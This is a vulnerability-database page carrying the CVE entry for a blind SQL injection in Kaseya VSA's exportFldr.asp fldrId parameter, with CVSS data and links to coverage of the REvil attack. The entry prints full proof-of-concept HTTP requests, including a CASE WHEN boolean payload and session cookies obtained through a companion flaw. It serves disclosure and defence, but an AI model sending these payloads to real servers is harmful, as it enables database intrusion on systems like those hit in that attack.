Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
cvelistMitreCVELIST:CVE-2021-30117
HistoryJul 09, 2021 - 1:18 p.m.

CVE-2021-30117 Authenticated SQL injection in Kaseya VSA < v9.5.6

2021-07-0913:18:21
mitre
www.cve.org
7
sql injection
kaseya vsa
api call
security vulnerability

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.661

Percentile

98.0%

JSON

The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description — Given the following request: GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 &lt;!DOCTYPE html&gt; &lt;HTML&gt; &lt;HEAD&gt; &lt;title&gt;Whoops.&lt;/title&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=Edge" /&gt; &lt;link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"&gt;&lt;/link&gt; ----SNIP---- However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 &lt;html&gt; &lt;head&gt; &lt;title&gt;Export Folder&lt;/title&gt; &lt;style&gt; ------ SNIP -----

Related

prion 2
attackerkb 2
cve 2
nvd 2
checkpoint_advisories 1
qualysblog 5
malwarebytes 2
thn 3
hivepro 1
cisa_kev 1
cvelist 1
threatpost 2
rapid7blog 1
krebs 1
nessus 1
avleonov 2
securelist 1
prion
prion
Sql injection
2021-07-09 14:15:00
Authentication flaw
2021-07-09 14:15:00
attackerkb
attackerkb
CVE-2021-30117
2021-07-09 00:00:00
CVE-2021-30116
2021-07-09 00:00:00
cve
cve
CVE-2021-30117
2021-07-09 14:15:07
CVE-2021-30116
2021-07-09 14:15:07
nvd
nvd
CVE-2021-30117
2021-07-09 14:15:07
CVE-2021-30116
2021-07-09 14:15:07
checkpoint_advisories
checkpoint_advisories
Kaseya VSA Remote Code Execution (CVE-2021-30116)
2021-12-27 00:00:00
qualysblog
qualysblog
Analyzing the REvil Ransomware Attack
2021-07-07 23:41:59
Kaseya REvil Ransomware Attack (CVE-2021-30116) – Automatically Discover and Prioritize Using Qualys VMDR®
2021-07-08 17:07:54
The Rise of Ransomware
2021-10-05 12:50:00
malwarebytes
malwarebytes
UPDATED: Kaseya hijacked, thousands attacked by REvil, fix delayed again
2021-07-02 21:46:15
Security vulnerabilities: 5 times that organizations got hacked
2022-06-21 10:04:02
thn
thn
Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly
2021-07-06 07:03:00
REvil Used 0-Day in Kaseya Ransomware Attack, Demands $70 Million Ransom
2021-07-05 05:22:00
Kaseya Releases Patches for Flaws Exploited in Widespread Ransomware Attack
2021-07-12 04:36:00
hivepro
hivepro
REvil Ransomware gang behind the Kaseya VSA Supply-Chain attack
2021-07-08 12:32:57
cisa_kev
cisa_kev
Kaseya Virtual System/Server Administrator (VSA) Information Disclosure Vulnerability
2021-11-03 00:00:00
cvelist
cvelist
CVE-2021-30116 Unauthenticated credential leak and business logic flaw in Kaseya VSA <= v9.5.6
2021-07-09 00:00:00
threatpost
threatpost
Kaseya Patches Imminent After Zero-Day Exploits
2021-07-06 15:42:42
Kaseya Patches Zero-Days Used in REvil Attacks
2021-07-12 15:53:42
rapid7blog
rapid7blog
Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies
2021-07-13 16:00:00
krebs
krebs
Kaseya Left Customer Portal Vulnerable to 2015 Flaw in its Own Software
2021-07-08 15:22:58
nessus
nessus
Kaseya VSA < 9.5.7a Multiple Vulnerabilities
2021-07-12 00:00:00
avleonov
avleonov
Last Week’s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers
2021-07-11 20:52:51
Last Week’s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins
2021-07-19 16:29:00
securelist
securelist
Cyberthreats to financial organizations in 2022
2021-11-23 10:00:13

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.661

Percentile

98.0%

JSON
Related for CVELIST:CVE-2021-30117
prion2attackerkb2cve2nvd2checkpoint_advisories1qualysblog5malwarebytes2thn3hivepro1cisa_kev1cvelist1threatpost2rapid7blog1krebs1nessus1avleonov2securelist1